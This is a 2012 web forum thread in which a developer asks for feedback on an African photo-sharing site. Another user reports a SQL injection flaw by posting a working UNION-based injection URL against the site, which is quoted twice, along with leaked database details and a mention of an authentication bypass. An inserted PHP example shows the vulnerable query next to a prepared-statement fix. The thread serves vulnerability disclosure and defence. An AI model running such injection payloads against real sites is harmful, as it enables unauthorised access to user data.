
I Need Some Input And Review On This Project So Far - Webmasters - Nairaland

I Need Some Input And Review On This Project So Far by nollyj: 5:22pm On Aug 29, 2012
I am making a photo sharing website that focuses on African photos and community. This is a project I am using to pass time since I am off from work now.

I am using php less framework because I wanted a responsive layout based on device resolution. Right now I have focused on one resolution but will soon complete others.

Please kindly tell me what you think and what to improve on. I know the whole website is not done but half way input will surely help in improving the final project.

I am integrating the facebook and twitter login script now.

Feel free to send your input irrespective of what you think about the website. http://inducesmile.com

Thanks so much for your time
Re: I Need Some Input And Review On This Project So Far by mitey(m): 9:52pm On Aug 29, 2012
I've not had time to go through the site, but at first glance, I like what I see.

The list of pictures on the home page is kind of long. Perhaps, you can break it into pages.

Then, as an indication of how interesting a photo is, you can add number of comments of each photo next to the number of views on the listing page.

When I have the time, I'll drop by and do a more thorough analysis.
Re: I Need Some Input And Review On This Project So Far by yawatide(f): 10:59pm On Aug 29, 2012
mitey, I concur.

OP:
Maybe you should have major categories (as links) listed on the home page, and maybe with a photo count for each section. Then I click a link that takes me to a page that has maybe 4 or 5 photos for that section and a "more" link to the rest.

Your site reminds me of why I don't like visiting facebook at times - na so so scroll scroll, to infinity.
Re: I Need Some Input And Review On This Project So Far by nollyj: 12:46am On Aug 30, 2012
Thank you mitey and yawatide for the comments and observation.
@yawatida, I implemented infinite scroll in the photo categories. I have seen infinite scroll in many websites before, but what I don't know for sure is whether many people like it (I did not search for any case study about infinite scroll). I have taken notice of the other points you guys raised.
Re: I Need Some Input And Review On This Project So Far by Slyr0x: 1:31am On Aug 30, 2012
Just signed up but was unable to login. .
Re: I Need Some Input And Review On This Project So Far by nollyj: 1:51am On Aug 30, 2012
Slyr0x: Just signed up but was unable to login. .
It seems you have run some vulnerability script on the website. Hope you did not find a hole. I don't know why you could not log in. Please can you try to log in again. Thanks
Re: I Need Some Input And Review On This Project So Far by yawatide(f): 10:02am On Aug 30, 2012
^^^Announcing to the world via NL that you might have a leak on your site, not exactly a good idea
Re: I Need Some Input And Review On This Project So Far by Slyr0x: 11:11am On Aug 30, 2012
An attacker can execute arbitrary SQL statements on your website

hxxp://www.inducesmile.com/photo.php?photo_id=-53+UNION+/*!SELECT*/+unhex(hex(group_concat(********,0x3a,********))),2,3,4,5+from+****--

Database: induce*****_***
User: induce*****_***@web07-00.local
Version: 5.1.63-0+squeeze1

Table "****"

How to fix this

1. Make use of prepared SQL Statements
2. Limit database privileges
3. Escape All User Supplied Input

You can read more here: https://www.owasp.org/images/7/7d/Advanced_Topics_on_SQL_Injection_Protection.ppt
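
Added example, not part of Slyr0x's post or the site's code: fixes 1 and 3 from the list above applied to a `photo.php`-style lookup, with the concatenated query beside the bound one. The table names, data and function names are constructed, and in-memory SQLite stands in for the site's MySQL server so the script runs offline.

```php
<?php
// Constructed schema and rows (assumptions, not the site's real tables).
$pdo = new PDO('sqlite::memory:', null, null,
               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec("CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT)");
$pdo->exec("CREATE TABLE members (name TEXT, pass_hash TEXT)");
$pdo->exec("INSERT INTO photos VALUES (53, 'Constructed photo title')");
$pdo->exec("INSERT INTO members VALUES ('demo_user', 'constructed-hash')");

// "Before": the request value becomes part of the SQL text, so anything
// appended to photo_id is parsed as SQL by the database.
function photo_titles_unsafe(PDO $pdo, string $photoId): array
{
    $sql = "SELECT title FROM photos WHERE id = " . $photoId;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// "After": reject anything that is not a positive integer, then bind the
// value so it travels as data, separate from the statement text.
function photo_titles_safe(PDO $pdo, string $photoId): array
{
    $id = filter_var($photoId, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];  // malformed id: treat as "no such photo"
    }
    $stmt = $pdo->prepare("SELECT title FROM photos WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal id, and one with the same shape as the
// request quoted in the post (negative id followed by a UNION).
$inputs = ['53', '-53 UNION SELECT pass_hash FROM members'];
foreach ($inputs as $input) {
    printf("%-42s unsafe=%s safe=%s\n", $input,
           json_encode(photo_titles_unsafe($pdo, $input)),
           json_encode(photo_titles_safe($pdo, $input)));
}

// With the MySQL PDO driver, also set PDO::ATTR_EMULATE_PREPARES to false
// so the server itself performs the binding.
// Fix 2 (limit privileges) is applied on the database server: the web
// account should hold only the rights photo.php needs on the tables it reads.
```

For the second input the concatenated version returns a row from the `members` table, while the bound version returns an empty result.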
Re: I Need Some Input And Review On This Project So Far by nollyj: 11:19am On Aug 30, 2012
Slyr0x: An attacker can execute arbitrary SQL statements on your website

hxxp://www.inducesmile.com/photo.php?photo_id=-53+UNION+/*!SELECT*/+unhex(hex(group_concat(********,0x3a,********))),2,3,4,5+from+****--

Database: induce*****_***
User: induce*****_***@web07-00.local
Version: 5.1.63-0+squeeze1

Table "****"

How to fix this

1. Make use of prepared SQL Statements
2. Limit database privileges
3. Escape All User Supplied Input

You can read more here: https://www.owasp.org/images/7/7d/Advanced_Topics_on_SQL_Injection_Protection.ppt

Thanks so much, I have fixed it. Thanks for pointing it out.
Re: I Need Some Input And Review On This Project So Far by Slyr0x: 12:57pm On Aug 30, 2012
Just checked again. .

Nice try with the redirect thing going on. .but it can be easily bypassed.

Watch this video I made some months back http://rotimiakinyele.com/posts/bypassing-authentication-with-the-firefox-addon-noredirect.jsp

You really need to go back to your scripts and do a full audit.

Let's continue this in your mailbox. .
Re: I Need Some Input And Review On This Project So Far by nollyj: 1:15pm On Aug 30, 2012
Slyr0x: Just checked again. .

Nice try with the redirect thing going on. .but it can be easily bypassed.

Watch this video I made some months back http://rotimiakinyele.com/posts/bypassing-authentication-with-the-firefox-addon-noredirect.jsp

You really need to go back to your scripts and do a full audit.

Let's continue this in your mailbox. .

ok use admin[at]inducesmile.com
